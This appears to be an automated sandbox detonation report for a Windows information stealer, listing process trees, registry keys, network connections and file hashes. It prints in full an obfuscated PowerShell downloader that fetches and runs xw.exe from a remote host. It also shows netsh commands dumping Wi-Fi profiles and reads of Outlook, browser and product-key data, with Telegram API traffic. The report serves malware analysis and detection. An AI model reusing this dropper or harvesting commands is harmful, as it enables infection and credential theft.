PID 3144 wrote to memory of 348 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 3144 wrote to memory of 348 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 3144 wrote to memory of 348 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 348 wrote to memory of 2812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 348 wrote to memory of 2812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 348 wrote to memory of 2812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 348 wrote to memory of 4464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 348 wrote to memory of 4464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 348 wrote to memory of 4464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTkshkQ($cDGZfk, $yzmbgckKGbazEIn){[IO.File]::WriteAllBytes($cDGZfk, $yzmbgckKGbazEIn)};function TkuLTlapXaFtTtwV($cDGZfk){if($cDGZfk.EndsWith((iyCVHkkuB @(46364,46418,46426,46426))) -eq $True){rundll32.exe $cDGZfk }elseif($cDGZfk.EndsWith((iyCVHkkuB @(46364,46430,46433,46367))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $cDGZfk}elseif($cDGZfk.EndsWith((iyCVHkkuB @(46364,46427,46433,46423))) -eq $True){misexec /qn /i $cDGZfk}else{Start-Process $cDGZfk}};function DTKsKtcccITMNLzYJ($OBbjRQJFrABngjzzKQR){$QxNgcQqldJUnDwxVjTSlD = New-Object (iyCVHkkuB @(46396,46419,46434,46364,46405,46419,46416,46385,46426,46423,46419,46428,46434));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yzmbgckKGbazEIn = $QxNgcQqldJUnDwxVjTSlD.DownloadData($OBbjRQJFrABngjzzKQR);return $yzmbgckKGbazEIn};function iyCVHkkuB($BmSsapwYTMD){$uhHMB=46318;$UzSaffw=$Null;foreach($WNyqiOQgreOPKu in $BmSsapwYTMD){$UzSaffw+=[char]($WNyqiOQgreOPKu-$uhHMB)};return $UzSaffw};function nBauMKwRs(){$WplUOTzLXWqwfc = $env:AppData + '\';$flgGVgp = $WplUOTzLXWqwfc + 'xw.exe'; if (Test-Path -Path $flgGVgp){TkuLTlapXaFtTtwV $flgGVgp;}Else{ $hkhkBA = DTKsKtcccITMNLzYJ (iyCVHkkuB @(46422,46434,46434,46430,46433,46376,46365,46365,46427,46415,46421,46423,46417,46364,46430,46429,46423,46433,46429,46428,46434,46429,46429,46426,46440,46364,46417,46429,46427,46365,46438,46437,46364,46419,46438,46419));QTkshkQ $flgGVgp $hkhkBA;TkuLTlapXaFtTtwV $flgGVgp;};;;;}nBauMKwRs;

C:\Users\Admin\AppData\Roaming\xw.exe

"C:\Users\Admin\AppData\Roaming\xw.exe"

C:\Users\Admin\AppData\Roaming\xw.exe

C:\Users\Admin\AppData\Roaming\xw.exe

C:\Users\Admin\AppData\Roaming\xw.exe

C:\Users\Admin\AppData\Roaming\xw.exe

C:\Users\Admin\AppData\Roaming\xw.exe

C:\Users\Admin\AppData\Roaming\xw.exe

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

"C:\Users\Admin\AppData\Local\Temp\loaderX.exe"

C:\Users\Admin\AppData\Local\Temp\build.exe

"C:\Users\Admin\AppData\Local\Temp\build.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 18.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 90.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 208.95.112.1:80 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 13.95.31.18:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
N/A 104.77.160.28:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 29.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 udp
N/A 162.159.134.233:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.18.114.97:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 152.199.19.74:80 tcp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
N/A 20.231.121.79:80 tcp
N/A 104.18.114.97:80 tcp
US 8.8.8.8:53 udp
N/A 151.80.29.83:443 tcp
US 8.8.8.8:53 udp
N/A 31.14.70.246:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.18.114.97:80 tcp
N/A 162.159.134.233:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 10.73.50.20.in-addr.arpa udp

Files

memory/4284-1-0x00000000714D0000-0x0000000071C80000-memory.dmp

memory/4284-2-0x0000000002BE0000-0x0000000002BF0000-memory.dmp

memory/4284-3-0x0000000002BE0000-0x0000000002BF0000-memory.dmp

memory/4284-0-0x0000000002B70000-0x0000000002BA6000-memory.dmp

memory/4284-4-0x0000000005840000-0x0000000005E68000-memory.dmp

memory/4284-5-0x00000000055F0000-0x0000000005612000-memory.dmp

memory/4284-6-0x0000000005790000-0x00000000057F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_scy4e343.033.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4284-7-0x0000000005E70000-0x0000000005ED6000-memory.dmp

memory/4284-17-0x0000000005FE0000-0x0000000006334000-memory.dmp

memory/4284-18-0x00000000064B0000-0x00000000064CE000-memory.dmp

memory/4284-19-0x00000000064F0000-0x000000000653C000-memory.dmp

memory/4284-20-0x0000000002BE0000-0x0000000002BF0000-memory.dmp

memory/4284-22-0x00000000069E0000-0x00000000069FA000-memory.dmp

memory/4284-23-0x0000000006A50000-0x0000000006A72000-memory.dmp

memory/4284-24-0x0000000007CC0000-0x0000000008264000-memory.dmp

memory/4284-21-0x0000000007670000-0x0000000007706000-memory.dmp

memory/4284-25-0x00000000088F0000-0x0000000008F6A000-memory.dmp

C:\Users\Admin\AppData\Roaming\xw.exe

MD5 eef7a52c4e6fc20cd22306b007b9b4c0
SHA1 700f935a3e75a0001654fae0b4d30af5044329c0
SHA256 1e5f96939d4d1af801f771de3da5e285c0c7dc4b376dfc127b7320926d0e0444
SHA512 4459e6f019a906c13bd41dc3664e0dc4567b8cd941712ecd79e3888fadce517ac640767f80d92fbc57963da5b8e648e1f6a6ec13efe1f37f3bc21b672ac70c70

C:\Users\Admin\AppData\Roaming\xw.exe

MD5 e6ccb03a4cd3aa39359361eae696ab9b
SHA1 ac58548d25dee7cc1c6f6b6eff1d53fabfc0aab3
SHA256 7cc9da41083cd2640ef63e8190fa4d426e9d03a930348d3dbbcb4074f39e91ba
SHA512 4e4ee151f1104cc1511b02d8140287b0c489bd21f1491f7b9f0229a31091572e211bcee98f3ec0dc29d8bb0169327b7063ad1a376918548f51aba32931b138cd

memory/1012-37-0x0000000000A90000-0x0000000000A9E000-memory.dmp

memory/4284-42-0x00000000714D0000-0x0000000071C80000-memory.dmp

memory/1012-41-0x00000000053F0000-0x0000000005400000-memory.dmp

memory/1012-40-0x00000000714D0000-0x0000000071C80000-memory.dmp

C:\Users\Admin\AppData\Roaming\xw.exe

MD5 041d958d503620fcee33aab200c8e17a
SHA1 6e6b21612723294622356d6897968faa05439b81
SHA256 1f84a7ebd0887401a73b3152d38b4ac6dd5b5203189744a645ca59c3e3f4dbfb
SHA512 f6ce0c7d592b5dd8c47fc5eded575be3ac74bb5ad874dfef8091fdbbf957487a0e74be68f229dd2849ec82b7479ec539043cea05687525af0849cbd879dce181

memory/1012-43-0x0000000008140000-0x00000000086A8000-memory.dmp

memory/1012-44-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-45-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-47-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-49-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-51-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-53-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-55-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-57-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-59-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-61-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-65-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-63-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-67-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-69-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-71-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-73-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-75-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-77-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-79-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-81-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-83-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-85-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-87-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-89-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-91-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-93-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-95-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-97-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-99-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-101-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-103-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-105-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-107-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-976-0x0000000004D80000-0x0000000004D81000-memory.dmp

memory/1012-977-0x00000000089F0000-0x0000000008EF0000-memory.dmp

memory/1012-978-0x0000000006D00000-0x0000000006D4C000-memory.dmp

C:\Users\Admin\AppData\Roaming\xw.exe

MD5 9b5571670ab852ab22ef3810cfd70159
SHA1 8c7972a29379b57f9e40d8b7af796eb938cf8670
SHA256 6e1a3a18373c5b55d3dd1e75c210bb15ede6de748c3b88af5858120144558ab1
SHA512 01e593ae4febe272b7f3fc303ba130797e1d36335716627ebd667d8c347302ca17d252f2cda37a6cb15906c12ba8c103e480b8a2ce97290a81cea500bb66a092

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xw.exe.log

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1012-985-0x00000000714D0000-0x0000000071C80000-memory.dmp

memory/3080-987-0x00000000714D0000-0x0000000071C80000-memory.dmp

memory/3080-986-0x0000000000400000-0x0000000000C0A000-memory.dmp

memory/3080-988-0x0000000005610000-0x00000000056A2000-memory.dmp

memory/3080-990-0x00000000055C0000-0x00000000055CA000-memory.dmp

memory/3080-989-0x0000000005790000-0x00000000057A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

MD5 f37938f3bb58f159e1d46403c6e0b10a
SHA1 78948994aa6c388b4356ee1eeb94b20cdfcda845
SHA256 634a0173ea818d5b152fcfbd8cc4b5d05fb381dac744b251a7b0184b2d7ddac8
SHA512 6345f8f659fbcd16bb9f42cb68270f9ab275a76ba0acc74cb55a1d6c1bfade06c0cf1d2fbd6b671cb0445869714a19bb8d08ac71ca57fdd21a941fe0b28773a5

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 a90e4f6bdd44a71e2246160693884539
SHA1 940ebec474e0b4d87dc4f06f37a1d32d2315cf56
SHA256 b2c5ecae8bdeb480fb306372d7a12d943531bd0de1b15f45168ba659f25694d4
SHA512 9a7fcd588ef5842798481bacfb7b32dd57efe06db3c852c69916d0045f806894d475ccf8f52bed942a35f4160bb6c3be7d635b17928d29148318c2858b62d937

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 d1aa9832a89fcef4fe32df07d43736c0
SHA1 75b1fd07a8a8935cfa8ab8fa816aebddbeefd1c5
SHA256 c82c8c416aec3df58bab4ec5b133a7a7ce2a64766c3ba7eab9d33e86be58a4ce
SHA512 bca7f2a3f5d4316cc96d73887ba350cc44fda87eaf609c535cf2eb91cc62bc04003303034bead8f759b531bc3b565d515d731584d64282d273a81c56ec1a9a84

memory/3144-1020-0x0000000000BD0000-0x0000000000D62000-memory.dmp

memory/3732-1021-0x00007FF9A8820000-0x00007FF9A92E1000-memory.dmp

memory/3080-1022-0x00000000714D0000-0x0000000071C80000-memory.dmp

memory/3144-1023-0x00000000714D0000-0x0000000071C80000-memory.dmp

memory/3732-1024-0x000001B3F36C0000-0x000001B3F36D0000-memory.dmp

memory/3732-1019-0x000001B3D8E70000-0x000001B3D8FE8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 ce008446a6fa668f1482d5dbf86db7a5
SHA1 e44d92971edbeb71bfd53e38b2d5dd31fe0dc216
SHA256 b8cf553f561a7594907f7407c23d79b21c175472f56a5bc55a377c6f3c908d4d
SHA512 980c5a16696eabe5f1c660750be914cd2df4e72111a416ad1d53efd8cb29852b64d5ffdb4e5286543aaa3b76ba599243f768c6338f23af0163dea9107e4cdd6d

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

MD5 dd87528a716d48530d8cc7fe6bec3386
SHA1 89351d5b60846912f216acb58219397fc1ca9aee
SHA256 eb2b5d61c9a6d7e26f81da14df0c063fb2c71ba294389fce6076a0ae52356244
SHA512 9f203bbb162250aab7cd643ac72f430ddd761c063d5a2fd6fd03cdf7707a6e6c287bfeba4b675d4173c92641573313d5f765afefa0c3d159e196542b10d6b861

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

MD5 45ea343e335d2d6400ccbc1e3fc85f11
SHA1 7f2267d1f27a076e284696c30a4cf4768fd1a52f
SHA256 f38fbc005bcaadb661f8f57f00eb44960e27a1cbf4c4012c3f27834e62a9c203
SHA512 c7689143605327ed63d967b81e7eb8eecf786b5273d772209d7581fc36517953b686a4c8196f9100acf026e9e8c5edc7724e5f0f77d0c982377dfd5d039e33a1

memory/3732-1026-0x000001B3F3950000-0x000001B3F39A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt

MD5 412ec159e4b14be1ca93db473e80acc2
SHA1 8909b6f7fc8715a749270b6ceb8f05f823f59fd3
SHA256 eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe
SHA512 a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4

C:\Users\Admin\AppData\Local\Temp\Data\Autofills.txt

MD5 6be6fdca0cfa94635b8689b2b0bf2bee
SHA1 379c61029b5443c3d3df7c770423e40618b36d15
SHA256 5bc3a7ced261f235f4a30797ad96f803c9e022a95ad6bc7fedc06d0fd2a0abeb
SHA512 7955fb48977c971563b10420e379ebea01e42582a8dfe2719ec756dda7e757168031a58a3c9fef061c0abb6c799579f7c8b46de4fc5b4ab3519d735092848cd8

memory/3144-1059-0x00000000055A0000-0x00000000055B0000-memory.dmp

memory/3732-1068-0x00007FF9A8820000-0x00007FF9A92E1000-memory.dmp

memory/3144-1071-0x0000000005E40000-0x0000000005ED2000-memory.dmp

memory/3144-1073-0x0000000005F00000-0x0000000005F08000-memory.dmp

memory/3144-1072-0x0000000005ED0000-0x0000000005EF6000-memory.dmp

memory/3144-1075-0x0000000006E90000-0x0000000006E98000-memory.dmp

memory/3144-1076-0x0000000006EB0000-0x0000000006ECE000-memory.dmp

memory/3144-1074-0x0000000006E80000-0x0000000006E8A000-memory.dmp

C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\Process.txt

MD5 d162920ec27ea267235b5216d6701181
SHA1 ef91540d216bead782f55da51239c2682dc7b71d
SHA256 c3f4acbecdd4feb212db3fac658cb531876ae23929b76cb49d35285409a224fd
SHA512 7e671cbc520856770e202e379979db04665b69c770ee984c36f5f2e5bb7a5c110400f7db99164f50c88762f141a104e769493b8765a9148108f750a0ba1567a4

C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\Apps.txt

MD5 b1d58554f33c991f9454f81bf1f6a7a6
SHA1 1a9c0748fbb4c4974315f6a3188ffb5078372de1
SHA256 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c
SHA512 ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6

memory/3144-1260-0x00000000055A0000-0x00000000055B0000-memory.dmp

memory/3144-1263-0x0000000006FE0000-0x000000000705A000-memory.dmp

C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Directories\OneDrive.txt

MD5 966247eb3ee749e21597d73c4176bd52
SHA1 1e9e63c2872cef8f015d4b888eb9f81b00a35c79
SHA256 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e
SHA512 bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa

C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Directories\Videos.txt

MD5 1fddbf1169b6c75898b86e7e24bc7c1f
SHA1 d2091060cb5191ff70eb99c0088c182e80c20f8c
SHA256 a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
SHA512 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d

C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\Debug.txt

MD5 894a0706eaf89a7b68175d7da206a8b3
SHA1 50cb6c62493034303e4d35aef1e0c45d5dd2e102
SHA256 ce03ca4421eaf1c1b578af11d74efd3d5d4198860e209ae4929f722cf2601f18
SHA512 1a06886bea0f2700b1a6d0d64f3d2cadf8b49ec1300b93dde40d50da2e563f9ec3ea4df446faf6462b95b375dc35a9ac8f71816eb06c96a9b7fea91817667924

memory/3144-1335-0x0000000007260000-0x0000000007312000-memory.dmp

C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\ProductKey.txt

MD5 71eb5479298c7afc6d126fa04d2a9bde
SHA1 a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256 f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA512 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

memory/3144-1337-0x0000000008630000-0x0000000008984000-memory.dmp

C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\msgid.dat

MD5 0195e3cc8225740a42592efa8bf12f60
SHA1 d4317e1f9762572ea061de3e2639f74cd2a941be
SHA256 0aeb189d6afa7545e36f66de5c3bd66f6ee12742d77168605c78588e9eebb1db
SHA512 8681594da21e812625a02322f0996f140b28f8554ae04cf9eb79723fb2c114e6bf8b4a1c42616254dfd709d3faf15924d344bfec840dd8121e9873d7f6e45173

memory/3144-1349-0x00000000714D0000-0x0000000071C80000-memory.dmp

memory/3144-1350-0x00000000055A0000-0x00000000055B0000-memory.dmp

memory/3144-1351-0x00000000055A0000-0x00000000055B0000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231222-en

Max time kernel

0s

Max time network

129s

Command Line

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Otcck.wav"

Signatures

Processes

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Otcck.wav"

C:\Windows\SysWOW64\unregmp2.exe

"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon

C:\Windows\system32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

C:\Program Files (x86)\Windows Media Player\setup_wm.exe

"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Otcck.wav"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

Network

Country Destination Domain Proto
US 8.8.8.8:53 wmploc.dll udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 183.1.37.23.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 23.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 83.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 61.179.17.96.in-addr.arpa udp
US 204.79.197.200:443 tcp
US 204.79.197.200:443 tcp
US 204.79.197.200:443 tcp
US 204.79.197.200:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\wmsetup.log

MD5 dbbe3b2e56558f128653635d80156427
SHA1 692dcec13ab48af5614982611af2cc048a30035f
SHA256 62ea3456f7158f1d8fa340cdcb9e7cf18f4763c66829c0aba175f6cd873e8961
SHA512 e47e76b71849f45a54b172762dcd023d6bdf03d37e3c22f33424a986863a24741352a7f021ea974cd42f15424ec6cf64dc436c16ea11f6572407bc09541c5a08

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 4ff06a33c8a7f9b17468a95e88f690c7
SHA1 917f7d8e8f6ac2603a2a1b5959f44b86e7b36ebb
SHA256 615904af68bd931ffad42d2868520dfc1e5e09889bb653c272531d154dc7f6a0
SHA512 05aff23b62a15e2efeb9f3a75301204252e766a4a8c8104f9fda086ee47e62f5e5bb7cc9595ba62721ef172250a11be16da67f4bd68a034d75ffb2dfbb061004

memory/1520-33-0x0000021DB49A0000-0x0000021DB49B0000-memory.dmp

memory/1520-65-0x0000021DBCE10000-0x0000021DBCE11000-memory.dmp

memory/1520-67-0x0000021DBCE40000-0x0000021DBCE41000-memory.dmp

memory/1520-69-0x0000021DBCF50000-0x0000021DBCF51000-memory.dmp

memory/1520-68-0x0000021DBCE40000-0x0000021DBCE41000-memory.dmp

memory/1520-49-0x0000021DB4AA0000-0x0000021DB4AB0000-memory.dmp